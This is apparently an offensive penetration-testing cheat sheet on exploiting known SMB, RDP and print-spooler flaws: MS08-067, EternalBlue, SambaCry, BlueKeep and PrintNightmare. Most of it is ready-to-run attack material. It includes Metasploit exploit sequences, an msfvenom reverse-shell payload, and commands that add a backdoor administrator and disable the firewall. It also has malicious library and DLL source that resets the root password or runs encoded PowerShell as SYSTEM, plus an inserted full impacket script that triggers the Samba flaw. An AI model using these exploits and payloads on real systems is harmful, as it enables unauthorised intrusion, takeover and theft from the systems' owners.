Low-Hanging Fruits

net_api

CVE-2008-4250, MS08-067

Check:

$ sudo nmap -n -Pn -sV --script smb-vuln-ms08-067 10.10.13.37 -p139,445
Or
msf > use exploit/windows/smb/ms08_067_netapi
msf > set RHOSTS file:smb.txt
msf > check

Exploit:

msf > use exploit/windows/smb/ms08_067_netapi
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run

EternalBlue

CVE-2017-0144, MS17-010

MSF

Check:

$ sudo nmap -n -Pn -sV --script smb-vuln-ms17-010 10.10.13.37 -p139,445
Or
msf > use auxiliary/scanner/smb/smb_ms17_010
msf > set RHOSTS file:smb.txt
msf > set THREADS 25
msf > run

Exploit with:

msf > use exploit/windows/smb/ms17_010_eternalblue
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run

EternalRomance / EternalSynergy / EternalChampion

Exploit with ms17_010_psexec:

msf > use exploit/windows/smb/ms17_010_psexec
msf > set RHOSTS file:smb.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run

Exploit with ms17_010_command:

msf > use auxiliary/admin/smb/ms17_010_command
msf > set RHOSTS file:smb.txt
msf > set COMMAND "net user hax0r Passw0rd! /add && net localgroup administrators hax0r /add"
msf > run

Manually

Send MSF payload and execute it with send_and_execute.py:

$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.13.37 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev.exe
$ python send_and_execute.py 10.10.13.38 rev.exe

Or just execute commands on host via zzz_exploit.py (at least one named pipe must be accessible on target):

$ python zzz_exploit.py 192.168.1.11
zzz_exploit.py
# ...
def smb_pwn(conn, arch):
	service_exec(conn, r'cmd /c net user hax0r Passw0rd! /add && cmd /c net localgroup administrators hax0r /add && cmd /c netsh firewall set opmode disable')
# ...

For x86 EternalBlue shellcodes use AutoBlue-MS17-010.

A patch for grabbing remote files from Victim:

$ git clone https://github.com/worawit/MS17-010.git && cd MS17-010
$ git checkout -b smb_get_file 83b3745
$ wget https://gist.github.com/snovvcrash/e910523a366844448e3a2b40685969e7/raw/e00b7b04aa5c96b0e5f21eae305448cf3c2fd4fa/zzz_smb_get_file.patch
$ git apply zzz_smb_get_file.patch

FuzzBunch (Wine)

SambaCry

CVE-2017-7494 (Samba 3.5.0 < 4.4.14/4.5.10/4.6.4)

MSF

msf > use exploit/linux/samba/is_known_pipename
msf > set SMB::AlwaysEncrypt false
msf > set SMB::ProtocolVersion 1
msf > run

Manually

Compile a shared library whose constructor runs as soon as smbd (which runs as root) dlopen()s it; this one just resets the root password so you can log in afterwards:

pwn.c
// gcc -shared -fPIC -o pwn.so pwn.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// Marked as a constructor: executed automatically when the library is loaded,
// i.e. inside the smbd process, without anything having to call it
static void pwn() __attribute__((constructor));

void pwn() {
	setresuid(0,0,0);                          // smbd is root already; make sure euid/saved uid are too
	system("echo 'root:Passw0rd!'|chpasswd");  // set the root password (noisy, but simple)
}

Get real share path on the target's filesystem:

$ rpcclient -U'%' -c'netsharegetinfo ShareName' 10.10.13.37
path:    /home/snovvcrash/sharename

Set up a Python 2.7 virtualenv for the exploit and run it; -r is the real server-side path the uploaded library will have (taken from the rpcclient output above), which the exploit opens as a "named pipe" to make smbd load it:

$ pip install virtualenv
$ virtualenv -p /usr/bin/python2.7 venv
$ . venv/bin/activate
$ pip install -r requirements.txt
$ ./exploit.py -t 10.10.13.37 -e pwn.so -s ShareName -r /home/snovvcrash/sharename/pwn.so -u anonymous -p ''
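The two SMB operations that exploit.py performs, written out with impacket as an added example (this is not the page's code nor the exploit author's): upload the library to the writable share, then open a "named pipe" on IPC$ whose name is the library's absolute path, which the vulnerable smbd hands to dlopen(). The function names `library_pipe_name` and `trigger` are mine; the block assumes impacket is installed, the target still accepts SMB1 (the vulnerable code path), and the share path was recovered with rpcclient as shown above.

```python
"""CVE-2017-7494 trigger with impacket (added example, not the original page's code).

1. putFile() writes pwn.so into the writable share.
2. openFile() on IPC$ with the library's absolute server-side path as the pipe
   name; smbd passes any pipe name containing '/' to dlopen(), so the
   constructor in pwn.so runs inside smbd as root.
Assumptions: impacket installed, SMB1 accepted by the target, share path known.
"""
import contextlib
import sys


def library_pipe_name(share_path, so_name):
    """Absolute path the uploaded library has on the server. It doubles as the
    pipe name that makes smbd load it, so it must be absolute and so_name must
    be a bare file name (the upload lands in the share root)."""
    if not share_path.startswith("/"):
        raise ValueError("share path must be absolute, e.g. /home/user/share")
    if "/" in so_name:
        raise ValueError("so_name must be a file name, not a path")
    return share_path.rstrip("/") + "/" + so_name


def trigger(host, share, share_path, so_path, user="", password=""):
    """Upload so_path into `share` on `host` and make smbd load it."""
    # Imported here so library_pipe_name() is usable without impacket present.
    from impacket.smb import SMB_DIALECT
    from impacket.smbconnection import SMBConnection

    so_name = so_path.rsplit("/", 1)[-1]
    pipe_name = library_pipe_name(share_path, so_name)

    # Force SMB1: the named-pipe handler reached via SMB1 is the vulnerable one
    # (the Metasploit module sets SMB::ProtocolVersion 1 for the same reason).
    conn = SMBConnection(host, host, sess_port=445, preferredDialect=SMB_DIALECT)
    conn.login(user, password)  # empty creds = anonymous/guest

    with open(so_path, "rb") as fh:
        conn.putFile(share, so_name, fh.read)  # step 1: upload into the share root

    tid = conn.connectTree("IPC$")
    try:
        conn.openFile(tid, pipe_name)  # step 2: smbd dlopen()s the library here
    except Exception as exc:  # expected: the pipe open fails after the load
        print("pipe open returned:", exc)
    with contextlib.suppress(Exception):  # the session may already be gone
        conn.disconnectTree(tid)
        conn.logoff()
    return pipe_name


if __name__ == "__main__":
    if len(sys.argv) != 5:
        sys.exit("usage: sambacry.py <host> <share> <share_path> <pwn.so>")
    print("triggered load of", trigger(*sys.argv[1:]))
```

Usage mirrors the exploit.py line above: `python sambacry.py 10.10.13.37 ShareName /home/snovvcrash/sharename pwn.so`. The open on IPC$ is expected to error out; what matters is that the constructor already ran by the time smbd reports the failure, so check the result (here: log in as root with the new password) rather than the return code.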

BlueKeep

CVE-2019-0708

Check:

msf > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf > set RHOSTS file:rdp.txt
msf > set THREADS 25
msf > run

Exploit (pick the TARGET profile matching the host's OS build and hypervisor, and set GROOMBASE if none matches; a wrong guess bluescreens the host instead of returning a shell):

msf > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf > set RHOSTS file:rdp.txt
msf > set LHOST eth0
msf > set LPORT 1337
msf > run

PrintNightmare

CVE-2021-1675, CVE-2021-34527

Check

CrackMapExec

$ cme smb hosts.txt -u snovvcrash -p 'Passw0rd!' -M spooler

ItWasAllADream

$ poetry run itwasalladream -d megacorp.local -u snovvcrash -p 'Passw0rd!' 192.168.1.0/24; cat "report_`date +'%Y_%m_%d_%H%M'`"* | grep -P '\d+\.\d+\.\d+\.\d+,Yes'

Exploit

C/C++

RCE (fork of the original repo):

LPE:

Python

RCE:

Usage

  1. Prepare an SMB share with anonymous authentication allowed (smbserver.py also works):

  2. Generate an evil DLL: a C2 stager / add user to a privileged group (1, 2, 3, etc.) / invoke a custom command (see example below).

  3. Run the exploit:

$ python CVE-2021-1675.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.11 '\\10.10.13.37\share\pwn.dll'
pwn.c
// x86_64-w64-mingw32-gcc pwn.c -o pwn.dll -shared

#include <windows.h>
#include <stdlib.h>
#include <stdio.h>

// Payload thread: started from DllMain so the loader is not blocked under the
// loader lock while the spooler (running as SYSTEM) loads the "driver"
DWORD WINAPI Entry(LPVOID lpParam) {
    system("powershell -enc <BASE64_PWSH_CODE>");
    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
            // Runs once, when the DLL is first mapped into the spooler process
            CreateThread(NULL, 0, Entry, NULL, 0, NULL);
            break;
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}

C#

RCE + LPE:

PowerShell

LPE:

Reproducibility

Flowchart by @wdormann:

Mitigation
